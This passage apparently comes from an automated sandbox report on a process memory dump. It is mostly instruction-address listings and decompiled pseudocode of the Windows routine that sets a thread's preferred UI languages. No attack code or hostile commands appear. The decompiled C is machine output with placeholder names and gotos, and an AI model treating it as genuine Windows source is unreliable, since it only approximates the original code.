                                                                  0x049626fb
                                                                  0x049626fe
                                                                  0x04962700
                                                                  0x049a5b60
                                                                  0x00000000
                                                                  0x04962706
                                                                  0x04962706
                                                                  0x0496270a
                                                                  0x0496270a
                                                                  0x0496270d
                                                                  0x04962713
                                                                  0x04962716
                                                                  0x04962718
                                                                  0x0496271c
                                                                  0x0496271e
                                                                  0x049a5b6c
                                                                  0x049a5b6f
                                                                  0x049a5b7f
                                                                  0x049a5b89
                                                                  0x049a5b8e
                                                                  0x049a5b93
                                                                  0x049a5b96
                                                                  0x049a5b9c
                                                                  0x049a5ba0
                                                                  0x049a5ba3
                                                                  0x049a5bab
                                                                  0x049a5bb0
                                                                  0x049a5bb3
                                                                  0x049a5bb3
                                                                  0x049a5ba3
                                                                  0x04962724
                                                                  0x04962726
                                                                  0x04962729
                                                                  0x0496272c
                                                                  0x0496279d
                                                                  0x0496279d
                                                                  0x049627a0
                                                                  0x049627a2
                                                                  0x00000000
                                                                  0x0496272e
                                                                  0x0496272e
                                                                  0x04962731
                                                                  0x04962734
                                                                  0x04962734
                                                                  0x04962736
                                                                  0x049a5bc1
                                                                  0x049a5bc1
                                                                  0x049a5bc4
                                                                  0x00000000
                                                                  0x049a5bca
                                                                  0x049a5bca
                                                                  0x049a5bcd
                                                                  0x00000000
                                                                  0x049a5bd3
                                                                  0x00000000
                                                                  0x049a5bd3
                                                                  0x049a5bcd
                                                                  0x0496273c
                                                                  0x0496273c
                                                                  0x04962742
                                                                  0x04962747
                                                                  0x0496274a
                                                                  0x0496274d
                                                                  0x04962750
                                                                  0x00000000
                                                                  0x04962756
                                                                  0x04962756
                                                                  0x00000000
                                                                  0x04962902
                                                                  0x04962908
                                                                  0x0496290b
                                                                  0x00000000
                                                                  0x04962911
                                                                  0x0496291c
                                                                  0x04962921
                                                                  0x00000000
                                                                  0x04962921
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962880
                                                                  0x04962887
                                                                  0x0496288c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962805
                                                                  0x0496280a
                                                                  0x04962814
                                                                  0x04962816
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496281e
                                                                  0x04962821
                                                                  0x04962823
                                                                  0x00000000
                                                                  0x04962829
                                                                  0x04962829
                                                                  0x04962831
                                                                  0x0496283c
                                                                  0x0496283e
                                                                  0x00000000
                                                                  0x0496283e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496284e
                                                                  0x04962850
                                                                  0x04962851
                                                                  0x04962854
                                                                  0x04962857
                                                                  0x0496285a
                                                                  0x0496285c
                                                                  0x0496285d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496275d
                                                                  0x04962761
                                                                  0x00000000
                                                                  0x04962767
                                                                  0x0496276e
                                                                  0x04962773
                                                                  0x04962773
                                                                  0x04962776
                                                                  0x04962778
                                                                  0x0496277e
                                                                  0x0496277e
                                                                  0x04962781
                                                                  0x04962781
                                                                  0x04962783
                                                                  0x04962784
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5bd8
                                                                  0x049a5bde
                                                                  0x049a5be4
                                                                  0x049a5be6
                                                                  0x049a5be8
                                                                  0x049a5be9
                                                                  0x049a5bee
                                                                  0x049a5bf8
                                                                  0x049a5bff
                                                                  0x049a5c01
                                                                  0x049a5c04
                                                                  0x049a5c07
                                                                  0x049a5c0b
                                                                  0x049a5c0d
                                                                  0x049a5c0d
                                                                  0x049a5c15
                                                                  0x049a5c18
                                                                  0x049a5c1b
                                                                  0x049a5c1b
                                                                  0x049a5c1e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049628c3
                                                                  0x049628c8
                                                                  0x049628d2
                                                                  0x049628d4
                                                                  0x049628d8
                                                                  0x049628db
                                                                  0x049a5c26
                                                                  0x049a5c28
                                                                  0x049a5c2d
                                                                  0x049a5c2d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5c34
                                                                  0x049a5c36
                                                                  0x049a5c49
                                                                  0x049a5c4e
                                                                  0x049a5c54
                                                                  0x049a5c5b
                                                                  0x049a5c5d
                                                                  0x049a5c60
                                                                  0x04962788
                                                                  0x04962788
                                                                  0x0496278b
                                                                  0x0496278e
                                                                  0x0496278e
                                                                  0x0496278e
                                                                  0x04962791
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962756
                                                                  0x04962750
                                                                  0x00000000
                                                                  0x04962794
                                                                  0x04962794
                                                                  0x04962795
                                                                  0x04962798
                                                                  0x04962798
                                                                  0x00000000
                                                                  0x04962734
                                                                  0x0496272c
                                                                  0x04962700
                                                                  0x049625ef
                                                                  0x049625ef
                                                                  0x049625ef
                                                                  0x049625f2
                                                                  0x049625f8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049625fe
                                                                  0x00000000
                                                                  0x049628e6
                                                                  0x049628ec
                                                                  0x049628ef
                                                                  0x049628f5
                                                                  0x049628f8
                                                                  0x049628f8
                                                                  0x00000000
                                                                  0x049628f8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962866
                                                                  0x04962866
                                                                  0x04962876
                                                                  0x04962879
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049627e0
                                                                  0x049627e7
                                                                  0x049627e9
                                                                  0x049627eb
                                                                  0x049a5afd
                                                                  0x00000000
                                                                  0x049a5afd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962633
                                                                  0x04962638
                                                                  0x0496263b
                                                                  0x0496263c
                                                                  0x0496263e
                                                                  0x04962640
                                                                  0x04962642
                                                                  0x04962647
                                                                  0x04962649
                                                                  0x0496264e
                                                                  0x04962650
                                                                  0x04962653
                                                                  0x04962659
                                                                  0x049626a2
                                                                  0x049626a7
                                                                  0x049626ac
                                                                  0x049626b2
                                                                  0x049a5b11
                                                                  0x049a5b15
                                                                  0x049a5b17
                                                                  0x00000000
                                                                  0x049626b8
                                                                  0x049626b8
                                                                  0x049626ba
                                                                  0x049627a6
                                                                  0x049627a6
                                                                  0x049627a9
                                                                  0x049627ab
                                                                  0x049627b9
                                                                  0x049627b9
                                                                  0x049627be
                                                                  0x049627c1
                                                                  0x049627c3
                                                                  0x049627c5
                                                                  0x049627c7
                                                                  0x049a5c74
                                                                  0x049a5c79
                                                                  0x049a5c79
                                                                  0x049627c7
                                                                  0x00000000
                                                                  0x049626c0
                                                                  0x049626c0
                                                                  0x049626c3
                                                                  0x049626c6
                                                                  0x049626c6
                                                                  0x049626c9
                                                                  0x049626c9
                                                                  0x00000000
                                                                  0x049626c9
                                                                  0x049626ba
                                                                  0x0496265b
                                                                  0x0496265b
                                                                  0x0496265e
                                                                  0x04962667
                                                                  0x0496266d
                                                                  0x04962677
                                                                  0x0496267c
                                                                  0x0496267f
                                                                  0x04962681
                                                                  0x049a5b49
                                                                  0x049a5b4e
                                                                  0x049627cd
                                                                  0x049627d0
                                                                  0x049627d1
                                                                  0x049627d2
                                                                  0x049627d4
                                                                  0x049627dd
                                                                  0x04962687
                                                                  0x04962687
                                                                  0x0496268a
                                                                  0x0496268b
                                                                  0x0496268e
                                                                  0x0496268f
                                                                  0x04962691
                                                                  0x04962696
                                                                  0x04962698
                                                                  0x0496269d
                                                                  0x0496269f
                                                                  0x00000000
                                                                  0x0496269f
                                                                  0x04962681
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962846
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962605
                                                                  0x0496260a
                                                                  0x0496260c
                                                                  0x04962611
                                                                  0x04962616
                                                                  0x04962619
                                                                  0x04962619
                                                                  0x0496261e
                                                                  0x00000000
                                                                  0x04962624
                                                                  0x04962627
                                                                  0x04962627
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5b1f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962894
                                                                  0x0496289b
                                                                  0x0496289d
                                                                  0x049628a1
                                                                  0x049a5b2b
                                                                  0x049a5b2e
                                                                  0x049a5b2e
                                                                  0x049628a7
                                                                  0x049628a9
                                                                  0x049a5b04
                                                                  0x049a5b09
                                                                  0x049a5b09
                                                                  0x049a5b09
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5b35
                                                                  0x049a5b3c
                                                                  0x049628fb
                                                                  0x049628fb
                                                                  0x049626cc
                                                                  0x049626cc
                                                                  0x049626d0
                                                                  0x00000000
                                                                  0x049626d2
                                                                  0x049626d2
                                                                  0x00000000
                                                                  0x049626d2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049625fe
                                                                  0x0496292d
                                                                  0x04962930
                                                                  0x04962935
                                                                  0x04962937
                                                                  0x0496293a
                                                                  0x04962942
                                                                  0x04962946
                                                                  0x0496294f
                                                                  0x04962957
                                                                  0x0496295e
                                                                  0x04962966
                                                                  0x0496296e
                                                                  0x0496296f
                                                                  0x04962972
                                                                  0x04962973
                                                                  0x0496297a
                                                                  0x0496297b
                                                                  0x04962982
                                                                  0x04962983
                                                                  0x04962984
                                                                  0x04962985
                                                                  0x04962986
                                                                  0x04962987
                                                                  0x04962988
                                                                  0x04962989
                                                                  0x0496298a
                                                                  0x0496298b
                                                                  0x0496298c
                                                                  0x0496298d
                                                                  0x0496298e
                                                                  0x0496298f
                                                                  0x04962990
                                                                  0x04962992
                                                                  0x04962997
                                                                  0x049629a3
                                                                  0x049629a6
                                                                  0x049629ab
                                                                  0x049629ad
                                                                  0x049629b0
                                                                  0x049629b2
                                                                  0x049a5c80
                                                                  0x049629b8
                                                                  0x049629b8
                                                                  0x049629bb
                                                                  0x049629c0
                                                                  0x049629c5
                                                                  0x049629c6
                                                                  0x049629c6
                                                                  0x049629c9
                                                                  0x049629cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049629cd
                                                                  0x049629d0
                                                                  0x049629d9
                                                                  0x049629db
                                                                  0x049629dd
                                                                  0x04962a7f
                                                                  0x04962a84
                                                                  0x04962a87
                                                                  0x04962a89
                                                                  0x049a5ca1
                                                                  0x049a5ca3
                                                                  0x00000000
                                                                  0x04962a8f
                                                                  0x04962a8f
                                                                  0x00000000
                                                                  0x04962a8f
                                                                  0x00000000
                                                                  0x049629e3
                                                                  0x049629e3
                                                                  0x049629e3
                                                                  0x00000000
                                                                  0x049629e3
                                                                  0x049629dd
                                                                  0x00000000
                                                                  0x049629db
                                                                  0x049629e6
                                                                  0x049629e9
                                                                  0x049629eb
                                                                  0x049629ed
                                                                  0x049629f3
                                                                  0x049629f5
                                                                  0x049629f8
                                                                  0x049629fa
                                                                  0x04962a97
                                                                  0x04962a9a
                                                                  0x04962a9d
                                                                  0x04962add
                                                                  0x00000000
                                                                  0x04962a9f
                                                                  0x04962aa2
                                                                  0x04962aa5
                                                                  0x04962aa8
                                                                  0x04962aab
                                                                  0x049a5cab
                                                                  0x049a5caf
                                                                  0x049a5cc5
                                                                  0x049a5cda
                                                                  0x049a5cdc
                                                                  0x049a5cdf
                                                                  0x049a5ce5
                                                                  0x00000000
                                                                  0x049a5ceb
                                                                  0x049a5ced
                                                                  0x049a5cee
                                                                  0x00000000
                                                                  0x049a5cee
                                                                  0x049a5cb1
                                                                  0x049a5cb4
                                                                  0x049a5cb9
                                                                  0x049a5cbb
                                                                  0x00000000
                                                                  0x049a5cbd
                                                                  0x049a5cbd
                                                                  0x00000000
                                                                  0x049a5cbd
                                                                  0x049a5cbb
                                                                  0x04962ab1
                                                                  0x04962ab1
                                                                  0x04962ac4
                                                                  0x04962ac6
                                                                  0x04962ac6
                                                                  0x00000000
                                                                  0x04962ac6
                                                                  0x04962aab
                                                                  0x00000000
                                                                  0x04962a00
                                                                  0x04962a09
                                                                  0x04962a0e
                                                                  0x04962a21
                                                                  0x04962a24
                                                                  0x04962a35
                                                                  0x04962a3a
                                                                  0x04962a3d
                                                                  0x04962a42
                                                                  0x04962a59
                                                                  0x04962a59
                                                                  0x04962a5c
                                                                  0x04962a5f
                                                                  0x04962a5f
                                                                  0x049629fa
                                                                  0x049629f3
                                                                  0x04962a64
                                                                  0x04962a64
                                                                  0x04962a6b
                                                                  0x04962a6b
                                                                  0x04962a6d
                                                                  0x04962a72
                                                                  0x04962a72
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PATH
                                                                  • API String ID: 0-1036084923
                                                                  • Opcode ID: a7dd4b875e23edd80ffd0beb1368151bf5fa61e5356b90781c4251671e7bfec9
                                                                  • Instruction ID: f5cd8229ac78800021c1c481a12e13b176c6ace91165c3f8a086750f2d981f05
                                                                  • Opcode Fuzzy Hash: a7dd4b875e23edd80ffd0beb1368151bf5fa61e5356b90781c4251671e7bfec9
                                                                  • Instruction Fuzzy Hash: ABC17F71E00219EFDB24EF98D980ABDB7B5FF88714F154479E802AB250E738B941DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 80%
                                                                  			E0496FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0494EEF0(0x4a27b60);
					_t134 =  *0x4a27b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4a27b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4a27b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04946D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E049476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E049D8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0493B150();
													}
													_t116 = E049D6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E049475CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4a28638; // 0x2a1c58
																	_t122 = L049438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E049476E2(_t154);
																			goto L41;
																		}
																	} else {
																		E049476E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0496FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L049470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0496FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0496FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0496FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0496FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0496FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4a27b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4a27b84 = _t75;
						_t73 = E0494EB70(_t134, 0x4a27b60);
						if( *0x4a27b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0494FF60( *0x4a27b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                  0x0496fab0
                                                                  0x0496fab2
                                                                  0x0496fab3
                                                                  0x0496fab4
                                                                  0x0496fabc
                                                                  0x0496fac0
                                                                  0x0496fb14
                                                                  0x0496fb17
                                                                  0x0496fac2
                                                                  0x0496fac8
                                                                  0x0496facd
                                                                  0x0496fad3
                                                                  0x0496fad3
                                                                  0x0496fadd
                                                                  0x0496fb18
                                                                  0x0496fb1b
                                                                  0x0496fb1d
                                                                  0x0496fb1e
                                                                  0x0496fb1f
                                                                  0x0496fb20
                                                                  0x0496fb21
                                                                  0x0496fb22
                                                                  0x0496fb23
                                                                  0x0496fb24
                                                                  0x0496fb25
                                                                  0x0496fb26
                                                                  0x0496fb27
                                                                  0x0496fb28
                                                                  0x0496fb29
                                                                  0x0496fb2a
                                                                  0x0496fb2b
                                                                  0x0496fb2c
                                                                  0x0496fb2d
                                                                  0x0496fb2e
                                                                  0x0496fb2f
                                                                  0x0496fb3a
                                                                  0x0496fb3b
                                                                  0x0496fb3e
                                                                  0x0496fb41
                                                                  0x0496fb44
                                                                  0x0496fb47
                                                                  0x0496fb4a
                                                                  0x0496fb4d
                                                                  0x0496fb53
                                                                  0x049abdcb
                                                                  0x049abdcb
                                                                  0x0496fb59
                                                                  0x0496fb5b
                                                                  0x0496fb5b
                                                                  0x0496fb5e
                                                                  0x049abdd5
                                                                  0x049abdd8
                                                                  0x00000000
                                                                  0x049abdda
                                                                  0x00000000
                                                                  0x049abdda
                                                                  0x0496fb64
                                                                  0x0496fb64
                                                                  0x0496fb64
                                                                  0x0496fb67
                                                                  0x0496fb6e
                                                                  0x0496fb70
                                                                  0x0496fb72
                                                                  0x00000000
                                                                  0x0496fb78
                                                                  0x0496fb7a
                                                                  0x0496fb7a
                                                                  0x0496fb7d
                                                                  0x0496fb80
                                                                  0x049abddf
                                                                  0x049abde1
                                                                  0x00000000
                                                                  0x049abde3
                                                                  0x00000000
                                                                  0x049abde3
                                                                  0x0496fb86
                                                                  0x0496fb86
                                                                  0x0496fb86
                                                                  0x0496fb8b
                                                                  0x0496fb90
                                                                  0x0496fb92
                                                                  0x0496fb94
                                                                  0x0496fb9a
                                                                  0x0496fb9b
                                                                  0x0496fba1
                                                                  0x049abde8
                                                                  0x049abdeb
                                                                  0x049abded
                                                                  0x049abeb5
                                                                  0x049abeb5
                                                                  0x049abebb
                                                                  0x049abebd
                                                                  0x049abec3
                                                                  0x049abed2
                                                                  0x049abedd
                                                                  0x049abedd
                                                                  0x049abeed
                                                                  0x00000000
                                                                  0x049abdf3
                                                                  0x049abdfe
                                                                  0x049abe06
                                                                  0x049abe0b
                                                                  0x049abe0d
                                                                  0x049abe0f
                                                                  0x049abe14
                                                                  0x049abe19
                                                                  0x049abe20
                                                                  0x049abe25
                                                                  0x049abe27
                                                                  0x049abe35
                                                                  0x049abe39
                                                                  0x049abe46
                                                                  0x049abe4f
                                                                  0x049abe54
                                                                  0x049abe56
                                                                  0x049abef8
                                                                  0x049abef8
                                                                  0x00000000
                                                                  0x049abe5c
                                                                  0x049abe5c
                                                                  0x049abe60
                                                                  0x00000000
                                                                  0x049abe66
                                                                  0x049abe66
                                                                  0x049abe7f
                                                                  0x049abe84
                                                                  0x049abe87
                                                                  0x049abe89
                                                                  0x049abe8b
                                                                  0x049abe99
                                                                  0x049abe9d
                                                                  0x049abea0
                                                                  0x049abeac
                                                                  0x049abeaf
                                                                  0x049abeb1
                                                                  0x049abeb3
                                                                  0x049abeb3
                                                                  0x00000000
                                                                  0x049abea2
                                                                  0x049abea2
                                                                  0x00000000
                                                                  0x049abea2
                                                                  0x049abe8d
                                                                  0x049abe8d
                                                                  0x049abe92
                                                                  0x00000000
                                                                  0x049abe92
                                                                  0x049abe8b
                                                                  0x049abe60
                                                                  0x049abe3b
                                                                  0x049abe3b
                                                                  0x049abe3e
                                                                  0x00000000
                                                                  0x049abe40
                                                                  0x049abe40
                                                                  0x049abe44
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049abe44
                                                                  0x049abe3e
                                                                  0x049abe29
                                                                  0x049abe29
                                                                  0x00000000
                                                                  0x049abe29
                                                                  0x049abe27
                                                                  0x00000000
                                                                  0x0496fba7
                                                                  0x0496fba7
                                                                  0x0496fbab
                                                                  0x049abf02
                                                                  0x0496fbb1
                                                                  0x0496fbb1
                                                                  0x0496fbb8
                                                                  0x0496fbbd
                                                                  0x0496fbbd
                                                                  0x0496fbbf
                                                                  0x0496fbbf
                                                                  0x0496fbc5
                                                                  0x0496fbcb
                                                                  0x0496fbf8
                                                                  0x0496fbf8
                                                                  0x0496fbfa
                                                                  0x00000000
                                                                  0x0496fc00
                                                                  0x0496fc00
                                                                  0x0496fc03
                                                                  0x00000000
                                                                  0x0496fc09
                                                                  0x0496fc09
                                                                  0x0496fc0f
                                                                  0x0496fc15
                                                                  0x0496fc23
                                                                  0x0496fc23
                                                                  0x0496fc25
                                                                  0x0496fc27
                                                                  0x0496fc75
                                                                  0x0496fc7c
                                                                  0x0496fc84
                                                                  0x00000000
                                                                  0x0496fc29
                                                                  0x0496fc29
                                                                  0x0496fc2d
                                                                  0x0496fc30
                                                                  0x049abf0f
                                                                  0x00000000
                                                                  0x0496fc36
                                                                  0x0496fc38
                                                                  0x0496fc3b
                                                                  0x0496fc41
                                                                  0x049abf17
                                                                  0x049abf19
                                                                  0x049abf48
                                                                  0x049abf4b
                                                                  0x00000000
                                                                  0x049abf1b
                                                                  0x049abf22
                                                                  0x049abf24
                                                                  0x049abf26
                                                                  0x00000000
                                                                  0x049abf2c
                                                                  0x049abf37
                                                                  0x049abf39
                                                                  0x049abf3b
                                                                  0x00000000
                                                                  0x049abf41
                                                                  0x049abf41
                                                                  0x049abf41
                                                                  0x049abf41
                                                                  0x049abf45
                                                                  0x00000000
                                                                  0x049abf45
                                                                  0x049abf3b
                                                                  0x049abf26
                                                                  0x00000000
                                                                  0x0496fc47
                                                                  0x0496fc47
                                                                  0x0496fc49
                                                                  0x0496fcb2
                                                                  0x0496fcb4
                                                                  0x0496fcb6
                                                                  0x0496fcdc
                                                                  0x0496fcdc
                                                                  0x00000000
                                                                  0x0496fcb8
                                                                  0x0496fcc3
                                                                  0x0496fcc5
                                                                  0x0496fcc7
                                                                  0x00000000
                                                                  0x0496fcc9
                                                                  0x0496fcc9
                                                                  0x0496fccd
                                                                  0x00000000
                                                                  0x0496fccd
                                                                  0x0496fcc7
                                                                  0x00000000
                                                                  0x0496fc4b
                                                                  0x0496fc4b
                                                                  0x0496fc4e
                                                                  0x0496fc4e
                                                                  0x0496fc51
                                                                  0x0496fc51
                                                                  0x0496fc54
                                                                  0x0496fc5a
                                                                  0x0496fc5c
                                                                  0x0496fc5f
                                                                  0x0496fc61
                                                                  0x0496fc63
                                                                  0x0496fc65
                                                                  0x0496fc67
                                                                  0x0496fc6e
                                                                  0x0496fc72
                                                                  0x0496fc72
                                                                  0x0496fc72
                                                                  0x0496fc72
                                                                  0x0496fc67
                                                                  0x0496fc61
                                                                  0x00000000
                                                                  0x0496fc5a
                                                                  0x0496fc49
                                                                  0x0496fc41
                                                                  0x0496fc30
                                                                  0x0496fc27
                                                                  0x0496fc03
                                                                  0x0496fbcd
